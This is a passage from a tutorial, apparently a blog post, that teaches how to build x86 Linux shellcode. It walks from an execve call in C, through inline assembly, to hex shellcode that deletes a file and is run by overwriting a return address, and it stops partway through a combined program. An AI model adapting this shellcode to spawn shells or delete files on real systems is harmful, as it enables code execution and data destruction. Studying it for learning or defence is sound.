<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">unistd.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> execve<span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">const</span> <span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>filename<span style="color: #308080;">,</span> <span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span><span style="color: #200080; font-weight: bold;">const</span> argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">,</span>
<span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span><span style="color: #200080; font-weight: bold;">const</span> envp<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">As you can see, there are three formal parameters in execve system call.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">1. the filename is the file you want to execute.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. argv is an array of argument strings passed to the new program.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">3. the last one is not important in our shellcode, so I will not explain it in detail.</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Let's write a simple C program which use the execve system call.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve_pre.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #004a43;">#</span><span style="color: #004a43;">include </span><span style="color: maroon;"><</span><span style="color: #40015a;">unistd.h</span><span style="color: maroon;">></span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: #406080;">{</span><span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #406080;">}</span><span style="color: #406080;">;</span>
execve<span style="color: #308080;">(</span>argv<span style="color: #308080;">[</span><span style="color: #008c00;">0</span><span style="color: #308080;">]</span><span style="color: #308080;">,</span>argv<span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">compile the program and execute with the following command.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">1.gcc -o exe.out execve_pre.c</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">2.touch test </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">P.S the touch command is to create a empty file.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">3. ./exe.out</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">And you will see the "test" is being removed.</span></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: inherit;">Now turn this into the inline assembly.</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve.c</span></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> <span style="color: #308080;">*</span>argv<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: #406080;">{</span><span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: maroon;">"</span><span style="color: #308080;">,</span><span style="color: #7d0045;">NULL</span><span style="color: #406080;">}</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">movl $0xb,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl argv,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $argv,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">Compile and execute it.</span></div><div><span class="Apple-style-span" style="font-family: inherit;">The result is the same as the previous example.</span></div><div><span class="Apple-style-span" style="font-family: inherit;">However, as I mentioned before, I don't want the data outside the shellcode.</span></div><div><span class="Apple-style-span" style="font-family: inherit;">Therefore, I need to write the data into the shell code. </span></div><div><span class="Apple-style-span" style="font-family: inherit;">And the way I get the address of the data is still the same, the relative jmp/call trick.</span></div><div>The following is the code looks like:</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve2.c</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x8(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> movl $0xb,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl %edx,%edx</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">/</span>bin<span style="color: #308080;">/</span>rm\<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">.</span><span style="color: #308080;">/</span>test<span style="color: maroon;">\"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .byte 0x0,0x0,0x0,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div>In order to create a structure like </div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">char *argv[]={"/bin/rm","./test",NULL};</span></div><span style="font-family: inherit;">I use the stack to store those data.</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">1. we get the address of "</span><span style="font-family: "Courier New",Courier,monospace;">/bin/rm" by the relative jmp/call trick and pop to the %esi.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">2. copy the content of the %esi to %ebx.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">3. leal 0x8(%esi), %esi => %esi += 8;</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> After the instruction, %esi now point to the "./test" </span><br />
<span style="font-family: "Courier New",Courier,monospace;">4. push 0, address of the "./test" and address of the "/bin/rm". </span><br />
<span style="font-family: "Courier New",Courier,monospace;">P.S since the stack grows down, push the parameter in reverse order. The memory layout is list in figure 1. </span><br />
<div style="font-family: "Courier New",Courier,monospace;"><b><figure 1> </b></div><div style="font-family: "Courier New",Courier,monospace;"><b>low ------------------------------------------ high</b></div><div style="font-family: "Courier New",Courier,monospace;"><b>|address of "/bin/rm"| address of "./test" | NULL</b></div><div style="font-family: "Courier New",Courier,monospace;"><b>| %ebx | %esi | %eax</b></div><div><br />
</div><div>After doing the above steps, then I can move the parameter to the register which the int $80 need.</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">1. since the %ebx alrealy contains the address of the structure, there is no need to set it again.<br />
</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">2. </span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;">movl %esp,%ecx; </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">store the address of the structure to the %ecx. This instruction is equal to</span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><i><b>execve(argv[0],<span class="Apple-style-span" style="color: #38761d;">argv</span>,NULL);</b></i></span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">3. <span style="color: #38761d;">xorl %edx, %edx</span></span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;">; </span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">store the NULL pointer to the %edx. This instruction is equal to</span><span class="Apple-style-span" style="color: #38761d; font-family: 'Courier New',Courier,monospace;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><i><b>execve(argv[0],argv,<span class="Apple-style-span" style="color: #38761d;">NULL</span>);</b></i></span><br />
</div><div>And now it's time to compile the source code and execute it.</div><div></div><div>Use objdump to copy the machine code to the new source file. (If you have no idea how to use it see the previous post of the shell code)</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execve3.c</span></div><div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* This is the shellcode */</span>
<span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span> <span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x22</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xc0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf3</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x8d</span><span style="color: #0f69ff;">\x76</span><span style="color: #0f69ff;">\x08</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x50</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x56</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x53</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x0b</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x31</span><span style="color: #0f69ff;">\xd2</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xd9</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">/bin/rm</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">./test</span><span style="color: #0f69ff;">\x0</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">void</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span> <span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ret<span style="color: #406080;">;</span>
<span style="color: #595979;">/* overflow the return address */</span>
ret <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ret <span style="color: #308080;">+</span> <span style="color: #008c00;">2</span><span style="color: #406080;">;</span>
<span style="color: #308080;">(</span><span style="color: #308080;">*</span>ret<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre></div><div><span class="Apple-style-span" style="font-family: inherit;">Compile the source code, use execstack to enable the executable stack and execute it, you will see the result is what we expected.</span></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div><b><i>Actually the execve system call is very dangerous. The above is just using the /bin/rm to remove a file, what if someone use /bin/sh to create a new shell, the consequence is unpredictable.</i></b></div><div>After verified the result, let's now combine the whole code together.</div><div><br />
</div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">All.c</span></div><div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* </span>
<span style="color: #595979;"> * The inline assembly mix all the code together.</span>
<span style="color: #595979;"> * It will print a message,</span>
<span style="color: #595979;"> * wait 2 seconds and</span>
<span style="color: #595979;"> * remove a file called test.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> mul </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> inc </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x4, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x8, </span><span style="color: #0f69ff;">%d</span><span style="color: #1060b6;">l;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0x2, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0xa2, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x9(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si),</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x8(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pushl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movb $0xb, %al;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xor </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> xorl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> leal 0x1(</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx), </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string \</span><span style="color: maroon;">"</span>Run Han<span style="color: #308080;">!</span><span style="color: maroon;">\"</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">/</span>bin<span style="color: #308080;">/</span>rm\<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">\"</span><span style="color: #308080;">.</span><span style="color: #308080;">/</span>test<span style="color: #308080;"></span><span style="color: maroon;">\"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
